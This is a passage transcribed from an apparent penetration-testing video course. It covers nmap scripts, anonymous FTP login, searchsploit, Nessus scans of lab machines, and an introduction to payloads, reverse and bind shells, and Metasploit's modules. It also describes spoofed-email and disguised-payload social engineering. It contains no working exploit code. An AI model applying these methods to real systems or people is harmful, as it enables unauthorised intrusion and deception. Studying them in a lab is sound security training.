to run it, in case you want to run it, you can type sudo nmap --script, and it is similar to running the script groups. All we need to do is just paste the name of the script and add the IP address. It will start running this script onto the target, and for now it seems that we got the exact same output of a normal nmap scan. Usually you will get this output. That means the script didn't work. So since this one didn't seem to give any output, let's try another one. Let's try the one that we already know will give us an output, and that one is ftp anon.nse. And remember when we ran one of the script groups? This script gave us the output for the FTP port, telling us that anonymous FTP login is allowed. Let's see whether we get the same result right now. If I run it, go all the way up, and it tells us anonymous FTP login allowed. And I already told you that FTP anonymous login means that you can use anonymous username and a random password to log into the FTP. Let's see whether it will work. Let's just test it out. We are curious. We want to see what does this anonymous FTP login mean. To do that, we're going to connect to a target using FTP. So you just type FTP and then the IP address of the target machine, in our case of the Metasploitable, press enter, and right here it will ask us for the name. Let's type anonymous, and let's type the password. Here you can type anything you want. In my case I will just type password 123 and press enter, and here it is. Login successful. Remote system type is Unix. And now we can use the help command to see what are our available options inside of this FTP server. So we can run these commands right here. Great, it seems that FTP anonymous login is indeed allowed. But once again, more about FTP and the FTP vulnerabilities that we discovered in the exploitation section. For now, we managed to find out about some potential vulnerabilities, such as the Tomcat administrator login. The FTP port 21 showed to also be vulnerable. Remember when we ran the exploit script group, it told us that it is exploitable. But let's also see what else we can find using other vulnerability analysis tools. Welcome back. And in this video, I want to show you something that you will do every time you perform a penetration test. I want to show you how to manually search for vulnerabilities. And this is something that you will do a lot. You will use this more than any other tool that we covered. So what manual vulnerability analysis is us simply Googling the vulnerabilities. For example, suppose we are attacking a target, and right here I just performed the version scan for the Metasploitable. Imagine Metasploitable is our target, and we just performed this version scan. We got these different ports open and different versions. how do we know if they are vulnerable without using any tool? Well, what we can do is we can copy the name of the version that is running on an open port, then go to Google and just paste that name and add exploit. And here it is. We're already getting some response back. Python exploit for this version, which is the exact version that our Metasploitable has. VSFTPD, the exact version that we have. Backdoor command execution. And what you would do is you would just go to these links and try to find the exploit for it. Down here we already see that an exploit already exists. For which platform it is, we can see right here the source code if we want to. And here it is. The exploit is coded in Python in this case. And this is how you would do most of your vulnerability analysis. We also get the module options, and what these module options are is something that we will cover in the exploitation section. This is how we can exploit the target using tools. We're going to cover that shortly. For now on, this is the way that you can find out how to exploit the target. You just go through a bunch of links and see whether someone already came up with the exploit for that specific version. In this case, for the VSFTPD 2.3.4 version. And you would do this for any version that you discover. For example, you can go right here, Apache HTTPD, and copy the version. Make sure that you copy the number as well, which in our case is 2.2.8. Then go and paste the name of that version. Add exploit. And here we already get some output. Security vulnerabilities. If we click on it, we can see all of the vulnerabilities that this version of Apache has. Right here we can see which score they have, and the higher the score, the stronger the vulnerability. Right here we can see the vulnerability ID, which, remember from the last video I told you this format is used for vulnerabilities and you will see it a lot. And we can see all the vulnerabilities that it has. This one particularly we are really interested in. Why? Well, because it has the score 10. That means that it is a really strong vulnerability, most likely execution of code or remote access to the target. And it indeed is. It says right here, code execution. And if you click on it, you can see what this vulnerability does. You can see confidentiality impact is complete, integrity impact complete, availability impact complete. There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable, so this also seems like some kind of a DOS attack. And down here we can see that this will most likely work only for Windows. As I'm noticing Windows right here a lot. Windows right here, Windows right here. Now of course you would read through this a little bit more detailed, but for now this doesn't seem as an exploit that would work on our Metasploitable, because Metasploitable is running on Linux. And this is what you would do most of your time, researching for vulnerabilities. This is how you find them, and then you search for the exploit created by someone else that you can use to exploit the target. Another thing that you can do is you can use a tool inside of the Kali Linux called Searchsploit. And Searchsploit, if I type --help, simply takes the input of the version of software, and then it searches through Kali Linux database through all of the exploits that Kali Linux has and tries to find an exploit that will work for that specific version. Right here we have some usage examples, but we don't need to perform these complicated commands. All we can do is copy, for example, some version. Let's say we copy this version of software, Unreal IRC, and copy this. And what we can do once we copy that version is type searchsploit and then paste the version name. And we get the result. It will tell us right here there are already some existing exploits for the Unreal IRC. We also get which version are the exploits for. One of them are backdoor command execution. The second one is local configuration stack overflow. We also get the denial of service exploit. And on the right side, we get the path to those exploits. Right here, this one is under Linux remote and it is named 16922.rb. And this RB simply stands for Ruby. This is coded in Ruby language. One of them is for Windows, one of them is for Linux. Since we're running Metasploitable, we would only be interested in the Linux exploits. So let's try to navigate here. How we can find this exploit? Well, we can copy the name of the exploit and use locate command to find where exactly this exploit is located on our machine. And it is in this path right here. So you can copy to this directory, cd, and then paste the directory name. And if I were to nano 16922.rb, this will open an exploit that we would use to attack that Unreal RC open port. As we can see, it also tells us that this is a backdoor program. This file is also part of Metasploit framework, and Metasploit framework is one of the biggest tools that we are going to cover in the next section. We'll cover all of the basics of it, and we will also cover how we can run exploits and attack different machines using this Metasploit framework. Okay, cool. We found an exploit for this specific software using Searchsploit. So now we know we got exploit for that version of software that we have on our Metasploitable. So this is usually how you would perform most of your vulnerability analysis. You either use tools like Searchsploit, or you manually try to find an exploit on Google to see whether anyone has exploited it before, and if they have, how did they do that? You would also use Nmap scripts sometimes, but I personally rarely use Nmap scripts for vulnerability analysis. And the last tool that we are going to cover for the vulnerability analysis is going to be Nessus, which we will see in the next section. That tool is huge, and you will use it a lot in your vulnerability analysis. See you there. Welcome back. In this video, we're going to see how we can install a really useful tool for vulnerability analysis. Probably one of the best tools that perform this process automatically. It is very easy to use, and this tool is called Nessus. To get it running, we must first download and install it. So to do that, open up your Firefox, and in the search bar, we can type Nessus. If we scroll down to this Tenable link that says Download Nessus Vulnerability Assessment, we can click on it, and right here we're going to see two different versions of Nessus that we can download. We can get the free version that allows us to scan up to 16 IP addresses. And by the way, this Nessus Essentials will only allow us to scan inside of the network. You will not be able to scan external IP addresses using this. However, you will get high speed, in-depth assessment, free training and guidance, and support via Tenable community. Once you start performing real-life penetration tests, and you start scanning different companies, their networks, and so on, this Nessus Professional option will be really useful for you. It tells you right here you get unlimited assessments, you can scan unlimited IP addresses, you can use it anywhere, you get live results, configuration assessments, bunch of different things, but it also comes with a really expensive price. However, this is something that pays off once you perform real-life penetration tests. Okay, right now we're interested in the free version, so let us click download on the Nessus Essentials. So you can choose to register right here, or what else we can do is we can type Nessus download and download it straight away to our Cal Linux. We can click right here, download Nessus Tenable, and right here we are going to see different Nessus versions. In this case, since I'm running Cal Linux 64-bit, I'm interested in this Nessus Debian AMD 64. If I click on it, click on I agree, it will ask me whether I want to open or save the file. I want to save it, and it will download the file inside of my downloads directory. It will finish in just a few seconds. Here it is done, so let's click on this button right here. It will open our downloads directory, and once it opens up, we can lower this page right here and open terminal inside of the downloads directory. To install this, we can run sudo dpkg, which stands for dpackage, and then -i, which stands for install, and we can type the name of the Nessus. What you can do is you can just type capital N and then tab it to autocomplete it. Then press enter. It will ask me for the password. I will input it right here, and it will complete the installation process for us. Here it is, it finished in just a few seconds, and it tells us right here that we can start Nessus Scanner by typing this command. So let's just copy it right here. Let's run it, paste clipboard. Oh, we need to run it with user privileges, so let's type sudo and then paste the command. And it will tell us starting Nessus. Now, to go to Nessus, you need to copy this link right here. Copy the link, go to Firefox, open another page, we can close these two pages, and we can paste and go to that link. Let me enlarge this, and it will tell us potential security risk ahead. We don't really care about this, we know there is no risk right here, so click on Advanced, and go down here, accept the risk, and continue. Click on that, and this will start compiling plugins. This will take a few seconds, and soon it will ask us which version of Nessus we want to install, and we will also need to provide some additional information, such as email address and usernames and passwords. Here it is, right here specify Nessus Essentials, and click on Continue. Right here you will need to provide the first name, the last name, and the valid email address. Now, in case you don't use a valid one, you will not be able to use Nessus because it will send you the activation code to the email address that you specify right here. Now, since I already have an account, I will just skip this. And I will go and type my activation code right here. You should get this same window and the same question asked as soon as you specify the email address and the first and last name. Then you go to your email, find the activation code and type it in right here. Once you type your activation code, click on Continue, username and password. I will set right here Mr. Hacker, which is my username, and I will type in my password. It will ask you to set up your own username and to set up your own password. You can use whatever you want. After it, click on Submit. It will tell me setup is complete, and now it will start the true preparation for Nessus. This process right here will take some time. And by some time, I think it might take even up to 30 or 14 minutes. So just take a small break until all of this is over, and we're going to continue with Nessus in the next video. Okay, that was loading for over an hour. But it is finally over, so we're ready to explore the Nessus tool. It is pretty simple to use. Your page should be blank since you haven't performed any scan yet. So we can click right here on this X button, just to see better this page, and all we want to do from here is go to the New Scan button. Right here, we will see all of the available options that we can do for our scans. So we got Basic Network Scan, as it says a full system scan suitable for any host. We got the Advanced Scan, Configure a Scan without using any recommendations, and we got a bunch of the other options. And for some of them, we need the Nessus Professional version in order to use, such as this one, this one, this one, and all of these that have the upgrade on them. Now, as I already talked about, with Nessus Essentials, we're only going to be able to scan local IP addresses. Inside of a company, you could use this tool to scan their networks for vulnerabilities. However, you cannot scan an external IP address with this. So scanning a website is not going to work, unless it's inside of your network. Another thing to remind you is that we can scan with the free version up to 16 IP addresses. And if I'm not mistaken, those 16 IP addresses clean after 90 days, so after 90 days you will be able to scan more IP addresses, but I'm not sure about that. And if you have a free version and you have more than 16 targets, you will have to scan that network with multiple Nessus scans. So, scanning big enterprise networks for big companies will require Nessus Professional version. But what we want to do here, to learn Nessus and how to use it, we want to go onto the basic network scan. And this basic scan will require us to specify some options. Now, for our first scan, we'll be scanning only Metasploitable. So, turn it on if you haven't already. Check out the IP address of Metasploitable. In my case it is 192.168.1.4. And once you do that, we can proceed to specify our options. In the General tab, under the name, you can specify anything you want. I will simply just type Metasploitable. Under the description, I will just leave this empty, there is nothing really to specify here. You can put anything you want here, just so you can recognize which type of scan you did and on which target you did it. In the folder, we will leave it on My Scans, and in the targets, we specify the IP address of our target machine. Since right now we are only scanning one machine, we will specify the IP address of Metasploitable. But if you were to scan a network, you would specify something like this: 192.168.1.1/24, in case it is a /24 network. I believe you can also specify it like this, so dash 192.168.1.255. But right now, let us just go with our Metasploitable. And with the free version, we can't even scan 255 hosts. Remember, we can only scan 16. Once you specify this, we want to proceed to the Schedule tab. And here, this Schedule tab is useful once you want to schedule your scans on a certain period of time, or you just want to schedule a scan while you're doing something else on the side. For now, we're going to leave it off. Under the notifications, you can choose if you want to send results to some emails over SMTP server. We are not going to be doing that right now. In the Discovery tab, this is the important stuff. Here we choose how many and which ports we want to scan. We have an option of scanning common ports, and this is similar to Nmap default port scan. It will only scan most popular ports. Or you can select Scan All Ports, which we're going to use right now, to scan all 65,000 ports on our Metasploitable. And if you want, there is a custom option, which is the third option right here, but we're pretty satisfied with this Scan All Ports option. If we read the settings, the general settings always test the NASS localhost, use fast network discovery. Under the port scanner settings, we have Scan All Ports, use netstat if credentials are provided, use SYN-scanner if necessary, and we're pinging hosts using TCP, ARP, and ICMP. Good. Once you set this to scan all ports, you can go to the assessment, and in the assessment tab, we can choose what we want to scan for. So there are a few options. If I click right here on the scan type, we have scan for known web vulnerabilities, scan for all web vulnerabilities, and scan for all web vulnerabilities complex. For the purposes of this tutorial, we will be scanning for known web vulnerabilities. Why? Well, this will just take lesser time to finish. When you run scan for complex web vulnerabilities, it usually takes a lot more time. And we can see right here under the general settings, avoid potential false alarms, enable CGI scanning, and web applications, we will crawl up to 1000 pages, up to 6 directories, and we will test for known vulnerabilities in commonly used web applications. These are our assessment settings. But also keep in mind that if we discover some web vulnerabilities, we will see how to attack them in the web penetration testing section. That will come right after the exploitation section. For now, let us just see whether NASS will find something juicy. Right after, we go to the report settings, and usually you want to leave this on default, so we're not going to be changing anything right here. And finally, in the advanced tab, we will leave it on default for now and proceed to click on Save. So click on Save right here, and you should have your scan right here. Now, you will notice that it does not automatically start. We must launch it. And we do that by clicking on this arrow right here, which says Launch. Click on it. In just a few seconds, here it is. These green arrows will start spinning, and our scan has officially started. This will try to discover all the vulnerabilities it can find for the Metasploitable machine. Now, keep in mind that these scans can take a lot longer than Nmap scans. You can always check the current state of scan by clicking on the scan name, in our case on the Metasploitable, and you will be able to see what it managed to find for now during the scan. Different vulnerabilities will be marked with different colors. We will have blue color, which means information disclosure, and what that is it possibly managed to find some information that should be private, or it managed to find the service version or something similar that allows us to find out more information about the target. It doesn't necessarily mean that the information is useful though. Then we have green, yellow and orange vulnerabilities, or also known as low, medium and high vulnerabilities. And at the end, we get the most interesting vulnerabilities, which are critical vulnerabilities. This usually includes remote code execution or something similar. So what you can also do, you can click on them, and this is just what it managed to find at this current point of scan. So we got one critical vulnerability for now. We got two mixed vulnerabilities, one medium vulnerability, and some information disclosure right here. Let's go back, and we're going to wait for this to finish, and once it's done, we will get back to it and see the results. Alright, it is finally over. And we can see, if I click on the scan, that it managed to discover a bunch of vulnerabilities. All kinds of them. Let us go through these results and see some of the vulnerabilities it found. Remember, we are most interested in critical and high vulnerabilities. Others can also be useful, but these two are the main ones. First thing we see is that it managed to find 7 critical vulnerabilities, 11 high vulnerabilities, 36 medium vulnerabilities, 7 low, and 148 information disclosure. Let us click on the scan. Right here we can order the vulnerabilities by their severity. So if I click on this arrow, it will go from the information to the critical, but mostly we are interested in critical vulnerabilities, so I will click it once again, and let's go with any one of them. We're going to see an example of each vulnerability. We're going to check one critical, one high, one medium, one low, and one information disclosure. Let's go, for example, with this one. So it says NFS exported share information disclosure. This is a critical vulnerability. Down here we can see the description, and it says at least one of the NFS shares exported by the remote server could be mounted by the scanning host. An attacker may be able to leverage this to read and possibly write files on remote host. It tells us what is the solution to fix this vulnerability, as it says configure NFS on the remote host so that only authorized hosts can mount its remote shares. Down here it tells us where it found the vulnerability. It found it on our Metasploitable on the 2049 UDP port. And what you would do, for example, is you would then Google this vulnerability, which we learned in the previous video where we covered Googling vulnerabilities and search exploit, and you would see how you would exploit this. For now on, we know that this exists. Let's check another critical vulnerability. Let's go, for example, onto this one, bind shell backdoor detection. It says a shell is listening on a remote port without any authentication being required. An attacker may use it by connecting to the remote port and sending commands directly. This seems like a really big problem. And we're going to see in the next section how we can actually gain access from this critical vulnerability. It is very, very easy, trust me. But these types of misconfiguration happen often. Down here we can see the solution, verify the remote host has been compromised and reinstall the system if necessary. And the actual vulnerability is found on the port 1524 over TCP. Now, since critical vulnerabilities are most important, let us check another one. Let's go on to this one. VNC server password is password. So it seems that we get the default credentials for some software running on our Metasploitable. As it says, the VNC server running on the remote host is secured with a weak password. And this type of vulnerability is something that you will find the most. Now, it doesn't have to be anything connected to the VNC server, but weak credentials are something that even the biggest companies have. And you can have all the security in the world, but if your password is weak, none of that security will matter. Down here we see the Nessus logged in using a password. And what port was it on? It was port 5900 over TCP. So we will see how we can exploit all of this, but let us also check out some other vulnerabilities as well. Apache Tomcat AGP connector request injection. Let's click on it. This seems to be a high vulnerability, and it tells us a file read inclusion vulnerability was found in AGP connector. A remote unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. It tells us that the solution is to actually upgrade the Tomcat server to the newer version. And down here it tells us over which port did it find the vulnerability. which is port 8009. On the right side, we can also see some additional vulnerability information, such as what is the vulnerability for. It is for Apache Tomcat. Is the exploit available? Yes, the exploit exists for this, and they are available. The patch was published on March 1st, 2020, and vulnerability was also published on that same day, and Nessus managed to successfully exploit it. Reference information, and here are the vulnerability names. So you would just type this, search for an exploit for it, and you would manage to exploit the Metasploitable machine. Let's check out a few more vulnerabilities, and then we're going to wrap up with this tutorial. Let's go to a medium one, and let's go, for example, to this one, SMB sign-in not required. Sign-in is not required on the remote SMB server. An authenticated remote attacker can exploit this to conduct man-in-the-middle attacks against the SMB server. Now, we have not covered man-in-the-middle yet, but later in the course we will be devoting an entire section to this attack, to the man-in-the-middle attack. So for now, we just know that the SMB port, which is running on port 445, is vulnerable to the man-in-the-middle attacks. Okay, let us also check out some information disclosure. So right here we can see OpenSSL detection, service detection, GET request, SSL TLS version supported. So we can check out which SSL and TLS versions are supported. This plugin detects which SSL and TLS versions are supported by the remote service for encrypting communications. And this port seems to be running SSL version 2, SSL version 3, and TLS version 1. And these are just different protocols used for encryption of the data that is being transferred over this port. And once again, you will see that SSL is vulnerable to the man-in-the-middle attack. We can decrypt this data using that specific attack. However, don't worry if you fully don't understand what I'm talking about. This is once again something that we will cover in a later section. Okay, great. Do you see right now how amazing this Nessus scanner is? It literally gave us most of the vulnerabilities just from a single scan. In the next section, we will see how to exploit most of these vulnerabilities on the Metasploitable, but on other targets as well. In the next video, we're going to scan other machine using Nessus, and we're going to see what results we get. See you in the next video. Welcome back. In this video, I want to show you another example of a Nessus scan. So in the previous one, we scanned our Metasploitable, which is a Linux machine. Right now, we're going to see what results can we get scanning a Windows machine. So I have right here Windows 7 virtual machine, and what's special about this machine is that it hasn't been updated in a year. And keep in mind, there are a lot of people in the world that don't regularly update their operating systems. This machine specifically doesn't have any additional software installed and running on open ports. The only open ports it has are these ones, and most of them are open by default once you install Windows 7. Let us see what our Nessus scan will manage to find on an unupdated Windows 7 machine. So let's go right here and go on to new scan. We already know how we can perform the scan, so I will not be explaining the details. We navigate to the basic scan and we can type right here Windows 7. The IP address I checked out right here, it is 192.168.1.6, and if I scan it, go to the discovery, we can scan all ports. In the assessment, we're going to scan for known web vulnerabilities. In the report, we leave everything default, and in the advanced, we leave it on default. I will click on save, and I will just run my scan. This will start scanning my Windows 7 machine, and in a few minutes we will receive the entire scan and all the vulnerabilities it managed to find for our Windows 7 machine. Once again, keep in mind that it doesn't have any additional software installed. I just installed an operating system and connected it to my network. Let's wait for the scan to finish, and we're going to see what it will manage to find. Okay, the scan has finished. Let us check out the results that Nessus gave us. If I click on my Windows 7, we will see it managed to find 4 critical vulnerabilities and 2 high vulnerabilities. And these are the vulnerabilities it found on Windows machine that hasn't been updated. Let us check them out. If I click on this and click on Microsoft Windows Multiple Issues, we will see 4 critical vulnerabilities. Unsupported Windows OS. This means that the Windows has not been updated, as it says right here, is either missing a service packet or is no longer supported. This simply means it hasn't been updated in a while. As a result, it is likely to contain security vulnerabilities, and that is true. We get the MS14, which it says right here, vulnerability in channel could allow remote code execution, uncredentialed check. And down here, we also get what type of vulnerability it is. So we could just search for that vulnerability, search for an exploit, and gain access to our Windows 7 machine. We also get this RDP, RCE, or also known as the Blue Keep attack. And as you can see right here, this attack is relatively new. It's from 2019. So for example, if there was anyone running Windows 7 that hasn't updated their machine since 2019, they are vulnerable to this attack. This attack exploits Remote Desktop Protocol, which is running over the port 3389. Cool, right? We managed to discover vulnerabilities and critical vulnerabilities for the Windows 7 machine. This Nessus tool is really amazing. However, there are also some vulnerabilities that it didn't manage to find. And I'm talking about really high vulnerabilities. So it is finally time. In the next section, we're going to see how we can exploit a bunch of these vulnerabilities, how we can gain access to the target, steal information from the target. We will see also how we can maintain access on the target, and we will see how we can cover our tracks. See you in the exploitation section. Alright, let us cool down for a second. We have finished everything we could to gather information about our target. We performed information gathering and port scanning. We know which ports our target has open. We also know which softwares are running on those open ports and what operating system does our target have. Then we performed vulnerability analysis using different tools like Nessus and Nmap. One reminder that the best vulnerability analysis you can perform is you Googling, since some tools might fail to find vulnerability. It might not be in their database, but if you find out a version of a software and you Google it, if that software is vulnerable, it will most likely come up in some page. Now it is time to get our hands dirty. In the next video, we're going to see how we can exploit our Metasploitable machine and gain access to it. And we will also be attacking some other machines as well. All of these previous steps led to this final moment: hacking the target. Take a break if you need, and once you are ready, I will see you in the next section. Hello again, and welcome to the exploitation section of the course. It is time we learn how to gain access to our target. What we managed to do for now is, with the help of our Kali Linux machine, we managed to identify our target and find out a lot of information about it. Remember, once we were starting, we didn't know anything about it. But after, with the help of different tools such as Nmap, Nessus, WhatWeb, and others, we managed to gather enough information about our target to be able to exploit it. We have discovered opened and closed ports. We also discovered services running on those ports, including their versions. We found out what operating system was our target running. And we have also tried finding vulnerabilities to see whether the target has some known issues or bugs. In other words, we performed information gathering, scanning, and vulnerability analysis. Right now, the next step is to use that information we have to gain access to our target. Here is how the process goes. Imagine this is our target, and these are the information that we gathered for it. It is running Windows 10. We found out it has an older version of Windows 10 that hasn't been updated lately. We found 3 open ports and 1 filtered port, and we know for sure that one of those open ports has a vulnerable software running on it, since we also performed vulnerability analysis. Once we found out this information, the next step is to extract useful information from this. So in this case, what we would find most interesting would be these 2 facts. an outdated Windows 10 operating system, and a vulnerable software on port 1234. This is what we will use to attack the target. We would then exploit the target's vulnerability and gain access to it. But wait a second. What do I mean we would exploit the target? How do we do it exactly? And what does exploit the target even mean? Well, exploiting the target, in other words, is using its vulnerability that we discovered to send something called payload. What a payload is a program that we deliver to the target after the exploit. Usually, this program is something that allows us to execute commands on target system and navigate through its files and folders. Now, I know what you're thinking. It is still a little unclear to you as to how this works exactly. Don't worry, in the next 2 videos we will explain in details what exactly happens once we exploit a vulnerability and what type of payloads exist and which ones we will use the most. For now, it is important to remember that payload is a program that we drop after exploiting a target. And in 99.9% of cases, this will be a program that allows us to execute commands on target system, or also known as a shell. The first step would be us exploiting the target and sending shell or payload with it. That payload will then be on target's machine and it will execute. Once it executes, what it essentially does is it tells the target machine connect to that other machine and allow it to execute commands on your system. And that other machine would be our Kali Linux. And the third step is pretty easy. We just send the commands that we want our target to execute. We navigate through files, run other programs, and in return, target sends us an output of the command that we executed. Picture it like using target's terminal from our Kali Linux machine. However, there is one problem with this. Imagine we have 2 different targets, target A and target B. And let's say target A has a known vulnerability. It is running some outdated software on port 5555, for example, and in that case we would do what we just explained, which is exploit the target through the vulnerability and deliver the payload that will allow us to control that target machine. Well, this scenario would only work if the target has a vulnerability. But what if it doesn't have a vulnerability? What if all of its softwares are fully updated and secured? What then? In that case, we would do something similar. We would deliver the payload to the target, just this time we cannot do it through an exploit, which also means we can't make the payload auto-execute on the target, since once again there is no exploit that we can do. We must deliver the payload to target using different way, and also we must make it execute a different way. Well, in this case, social engineering comes in play. We would try to trick the user to open our payload by themselves. They must run it for us. How would we do that? Well, we could use different methods of delivering the payload. We could, for example, use an email containing our payload that we perhaps masked to look like an image or a different file type. We would also make sure that email looks legit and target doesn't think twice before trying to open that image. We could spoof our email address so it looks like someone that our target knows, so they would never think that the image we sent could contain something malicious. Once they open that image, in the background our payload executes, and it grants us access to their machine without them even knowing it. This is just an example. There are multiple ways that we can do this. If you were, for example, physically close to the target, you could infect it over USB drive. Plug the USB drive in the target machine and execute payload manually. But something like this you will almost never do, due to a higher risk, of course, and if you were even able to come close to the target machine. Nonetheless, these are the 2 different possibilities. Either target is vulnerable, or it isn't. However, if it isn't, we don't just quit. We try different methods. Throughout this section, we will cover another big tool that all hackers use, and that tool is called Metasploit Framework. It contains thousands of exploits, and all of them are already in our Kali Linux machine. All we need to do is learn how to use them and how to run them. This is something we will cover shortly in great details. Let's start hacking. What exactly is a vulnerability? We talked about process of gaining access and making target execute our commands, but let us explain what happens once we exploit a vulnerability. Well, let's start like this. And trust me, if it sounds a little complicated, it will be more clear once we get to practical examples in the next few videos. For now, let's explain it like this. We know that developers write programs. They use their code, which can be written in any language, whether it is Python, Java, C, or some other language. The goal for developer is to create a software using a programming language. And as we mentioned, that software can be based on any language whatsoever. Once the software is complete and it goes through a few test checks and security checks, then that software gets deployed on machines and it can be ran from those machines. This can be any type of software, it doesn't matter. However, the problem occurs once that software is open to the internet. For example, FTP is open on some machines and servers for file transfer protocol. SSH could also be open for secure shell connection. HTTP could be open to host a web page that clients connect to. Basically, if your software is hosted on an open port, then it is also open for possible attacks from the outside. And as we already know that the software is consisted of code that developers wrote, problem occurs if that code is not well written, if it has some bugs. Now, it doesn't necessarily mean that if there is a bug that we can exploit the target, but sometimes those bugs can be critical, and the attacker could use that bug to make software act in a way that it is not intended to. That's called exploitable vulnerability. Usually once exploited, we drop a payload or a shell back, so we can control that machine and do what we want with it. Once a bug or vulnerability is discovered, it gets that name that we've seen for vulnerabilities in Nessus that starts with CVE, and then the year of when the vulnerability first occurred. A vulnerability that exists and has not been patched yet by the vendors is called 0 day. Usually as soon as critical 0 day is discovered, it gets patched almost immediately, but you will see examples of 0 days that were used for months before anyone found out about them. The most known recent one was in 2017, when the WannaCry ransomware occurred and infected a bunch of hospitals and police stations. It was based on an exploit called Eternal Blue, which was created and used by NSA. They never reported it and used it for their attacks until those exploits got stolen from them and got leaked. We will see in this course a lot of recent 0 days that are now patched. Some of them will even be as recent as just few months ago. However, all of this makes sense if the target has a vulnerability. But remember, vulnerabilities don't always have to be of technical nature. Imagine a company with a bunch of networks, servers and machines, fully secured and also protected by the best firewall. No security holes, no vulnerabilities. We can't even scan the target to figure out its infrastructure because its protection is so good. Now, imagine an employee that works there. Let's call him John. And let's focus on John at the moment. John likes cars. He usually searches for car pictures and videos while working. One day he gets an email from a person that has email name exactly the same as his colleague. In that email, there is a car picture. He sees that the email is coming from his colleague, so he doesn't question it. Therefore, he opens that picture at work, and it indeed is a car picture. But little does he know, that email was us spoofing an email for him, so that at the first glance it looks like it comes from his colleague, and that picture opened a car image, but it also ran our malicious program in the background. What happens next? Now, John's work computer is infected, and he doesn't even know it. And from his computer, we can compromise the entire network and the entire inside of that company. Now, this is just an example, but stuff like this happens a lot. Matter of fact, most of the hacking that happens that you read about happens this way, and not by someone finding a zero-day vulnerability on a fully secured company. Remember, people are always the weakest spot, so if you can hack something through them, why would you bother trying to discover a technical vulnerability that might not even be there? In the next video, we're only left to talk briefly about shells and different types of shells that we want to drop once exploiting the target. After that, we are ready to get our hands dirty and start gaining access to our target machine. See you in the next video. Before we get into Metasploit framework and its structure inside of our Kali Linux, let us first talk about reverse shells and bind shells. As we already mentioned, shell is our access to the target machine. With the help of shell, we execute commands and control the target system. So, shell is essentially our payload that we drop on machine after exploiting it. However, there are two different types of shells. We got reverse shells and bind shells. Now, reverse shells are something that you will use a lot. It works on principle of target machine trying to connect back to our Kali Linux machine. For this to work, on our Kali Linux machine, we must first listen for the incoming connection over some port. Then we exploit the target and drop a shell which will tell that target machine to connect to our port on Kali Linux that we're listening on. After it completes the connection, we can then control that machine. On the other hand, bind shell is when the target machine opens their port for us to connect to. In this case, it is the target machine that is listening for the incoming connection on that port. And we are the ones that must connect to that port. After we do it, we can control that target machine. However, there is one problem with bind shell. And it is also one of the main reasons why we won't use it that much. And that is because firewall can forbid target machines to open a port. Many firewalls could have a rule that says don't open any random port for security reasons. Therefore, our bind shell would not work even after exploiting the target. However, reverse shells will always work. Why? Well, because the target in that case is just connecting to us. It is the same process as when the target visits a website. It connects to a port on that web server, and it gets the web page of that website back. Just in this case, it will connect to a port on our Kali Linux machine, and we will establish a shell like that. That's why reverse shell is always a better option if possible. Alright, cool. Now we are ready to start introducing ourselves to the Metasploit framework, the number one tool that we will use for exploitation. It is as important as Nmap, and we will use it a lot, so it is important we get its basics down first. It is not hard, however, it will take some practice to get used to it. Let's get straight into it. Welcome back. Let us talk about Metasploit framework. We already mentioned that we will use this tool a lot to exploit different targets and their vulnerabilities. But there are a few things we need to learn first about it before we get to use it. Remember when I told you that Metasploit framework offers us thousands of exploits that we can use for Windows, macOS, or Linux? While that is true, Metasploit offers us a whole lot more things that we can use besides the exploits. Matter of fact, exploits are just one of 7 modules that we can get with Metasploit. Besides them, we also get payloads, auxiliary modules, encoders, evasion modules, NOPs, and post-exploitation modules. If you are new to all of this, you probably have no idea what each of them are. Don't worry, we will explain it right now. First, to navigate to the Metasploit framework directory, we can type cd/user/share and then Metasploit-framework. You can just type meta and then tab it to autocomplete it. If I press here enter, and if I type ls right here in the Metasploit framework directory, we're going to see quite a few things. One of the most important things right here is this MSF console. And this is an executable file. This is our program. If we wanted to run Metasploit, we would just type MSF console in the terminal and it would open the Metasploit framework. The MSF Venom is also very important. This is a tool that we will use to generate a payload or a shell that we use to control the target machine with. But for this video, what we want to explain is this modules directory. If we change to that directory, so cd modules, and I type ls here, we will see those 7 modules that I mentioned. Let's talk about each one of them a little bit. We're already familiar with exploits, right? Let's go to that directory first. So cd exploits. And just to remind ourselves that an exploit module or program executes a sequence of commands to target a specific vulnerability in a system or application. It takes advantage of that vulnerability in order to provide us an access to that machine. There are a few different types of exploits, such as, for example, buffer overflow, code injection, web application exploits. But what is also important to mention right here regarding Metasploit is that once we type ls inside of this exploits directory, you will see these exploits are split into different groups. We got Windows exploits, OS X exploits, Linux exploits, Firefox exploits, and many others as well. And if we go to any of them, for example, let's go to Windows exploits, and I type ls right here, we will get even more division of exploits. All of the Windows exploits that we have are divided into a bunch of other submodules such as FTP, firewall, SMTP, SMB, and others. And all of them contain exploits for those specific things. If we navigate to, for example, HTTP Windows exploits, so let's go there. And I clear the screen, type ls right here. We will see there is a lot of them for the HTTP. And this .rb that all of these files have is just an extension for Ruby language. All of the exploits in Metasploit framework are coded inside of our Ruby language. And each one of these programs right here exploits a different vulnerability. If you were, for example, interested in how some of these work, you could open the code of an exploit using Nano Editor. Let's see, for example, this one. If I nano it, it will open the code of this exploit. And if you know Ruby language, you could figure out how this exploit works, right? It also gives us a description right here. So this exploits a stack buffer overflow in the Webster HTTP server. The server and source code was released within an article from the Microsoft System Journal in February 1996, titled Write a Simple HTTP. So this is an old exploit. But you can do this for any file that you want. You can just open it and see the code of that specific exploit. And that's how they are stored in Kali Linux. Let's also mention other modules that exist besides these. So if I go back to the modules directory and type ls, let's next talk about the auxiliary modules. So if I change directory to auxiliary and I type ls right here, then we will see that auxiliary modules are also split into different categories, as we can see right here. And an auxiliary module does not execute a payload like an exploit module does. It is used to perform different actions such as scanning, fuzzing, or denial of service attacks. These modules can sometimes be used in first 2 stages of penetration test, as there is a lot of them that perform fingerprinting and vulnerability scanning. If we go to one of these submodules, for example, let's go to sniffer submodule. If I type cd sniffer, type ls, well, it seems that there is only one sniffer in Metasploit. And we can see again it is also coded in Ruby language because of the .rb extension. If we go to a different auxiliary submodule, for example, let's go to this one, which is spoofing. So let's go to the spoofers, clear the screen, type ls. We can see they're also divided into even more submodules based on what it is spoofing. So it can spoof ARP requests, it can spoof DNS, it can spoof MDNS, and others as well. And all of these spoofers we can use for our attacks if we need to. Good. those are the auxiliary modules. Now, you can always explore others as well if you want to check out what different files this module has. But we're going to continue, and we're going to cover the next module from the Metasploit framework, which is the post exploitation module. And if I change directory to the post exploitation module, clear the screen and type ls, this module is used, as its name says, after exploiting the target. Usually, they're used to gather or steal information from target's device. That information 